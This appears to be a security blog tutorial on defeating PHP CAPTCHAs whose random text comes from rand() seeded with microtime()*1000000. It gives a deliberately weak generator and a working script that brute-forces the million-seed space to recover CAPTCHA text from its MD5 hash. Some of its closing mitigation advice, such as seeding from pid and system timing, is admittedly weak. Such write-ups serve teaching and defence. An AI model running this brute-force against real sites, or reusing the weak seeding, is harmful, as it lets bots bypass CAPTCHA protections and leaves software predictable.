What is a CAPTCHA?
CAPTCHA stands for 'Completely Automated Public Turing Test to tell Computers and Humans Apart'. You might best know them as 'Type what you see in this above image' tests. Now ignoring an attack using text recognition, I want to talk about an attack on this through rand and srand, and use this to illustrate the important of proper prodedure when dealing with random data.
Psuedo Random Number Generators
First a short description of Psuedo Random Number Generators (PRNG's). PRNG's generate sequences of (psuedo) random numbers. They start with an initial seed and from there generate random numbers. One thing to remember is that the same PRNG algorithm with the same seed will generate the same sequence of random numbers (we shall use this in our attack). Therefore you must pick a seed with a strong degree of randomness for the PRNG, otherwise as the seed is one of the weakest points, your rand is somewhat less random and prone to being broken by a malicious party.
The Problem, rand() in PHP
PHP includes a function srand() which sets the seed for our PRNG and then we have sucessive calls to rand() which allows us to extract random numbers.
Note
As of php 4.2 the random number generator is automatically seeded for you, however applications gennerally do one of 2 things:
- They still srand()
- They check the version of PHP and will srand() for versions < 4.2
#define GENERATE_SEED() ((long) (time(0) * getpid() * 1000000 * php_combined_lcg(TSRMLS_C)))
I have not had much time to look at this, but it does suffer from the flaw that time(0) is predicatble and getpid() typically has a very small space.
The problem is it is suggested (including within the PHP documentation) that you seed your rand()
using the following code:
(double) microtime() * 1000000
And most developers abide by this suggestion. Unfortunatly this is a bad idea as it relies on the system clock, a highly predictable and accessible number. Also, it is quite misleading. Microtime returns the system time to within a millionth, which is bad for an application but good for a malicious party as the search space is only 1,000,000 values.
So whats the attack?
Simple, we can seed the rand from 0 to 999999 (Our range of values from the recomended seed function) and one of them will be the correct seed. (It actually may get better. I wonder if all of those values have an even distribution, because I'm guessing they don't).
Once we have done this, we can then check the output of rand() from successive calls. For example say the following (poorly written) code generates a random string for a CAPTCHA image and then generates a unique MD5 hash from it:
<?php
// Standard way people are suggested to seed the rand in php (pre 4.2)
srand(microtime() * 1000000);
$hash = md5 (rand());
// Create a random string
$string = '';
$available = 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
for ($i = 0; $i < 5; $i++) {
$string .= $available[rand (0, (strlen ($available) - 1))];
}
echo 'String: '.$string."\n";
echo 'Hash: '.$hash;
?>
The idea is that the hash is used to identify which image associates with which piece of text. So we know the hash but not the text. Here is how we can determine the text from the hash.
<?php
/*
* Microtime only so accurate
* 0.xxxxxx00
* Means we check 1,000,000 values
*
* A common format of seeding the rand is microtime() * 1000000
* This reduces microtime to 1,000,000 values 000000 - 999999
* so that means we want to check all 1,000,000
*/
$md5 = '3f0d74d70f574dafb255cd3efd0163ef';
for($i = 0; $i < 1000000; $i++)
{
srand($i);
$x = md5(rand());
if($x == $md5) {
echo 'Hash Found...'."\n";
// Figure out the Random String
$string = '';
$available = 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
for ($i = 0; $i < 5; $i++)
{
$string .= $available[rand (0, (strlen ($available) - 1))];
}
echo 'String: '.$string;
echo "\n";
break;
}
}
?>
By Brute Forcing the small seed space, we have now found original string, and the string thatthe CAPTCHA expects only a human to be able to read. There are several open source PHP Applications that generate CAPTCHA's in this way (and several closed source ones) and they are all vulnrable to this attack. Also note that PHP uses common C functions to do alot of its rand(), so the program could easily be ported to C for a speed increase.
So How Can I Be Safe?
So now, how about prevention, firstly try and use mt_rand, it is a stronger more random algorithm. But as you have seen, even if you did you would still fall from this attack. You need to at least attempt to have a strong seed, and this is VERY hard to do. clearly using pid's and times are horrible but we dont gennerally have access to much else. However what one could do is this. At specified or random intervals seed a random number generator ( a strong one ) with a good seed. This seed could be composed of system microtime, system time, system date and pid (yes i know, this is weak) along side some added data maybe network data, uptime, users logged in, network activity, cpu activity, hard drive seek times, network latency and bandwidth (again, all not so good). And lastly with some good data, maybe data from http://www.fourmilab.ch/hotbits/ which is based on radiactive decay. Once you have this seed, seed a strong PRNG and then pull sequences either directly out of this or seed another PRNG with values from this PRNG.
I hope this has opened some eyes.
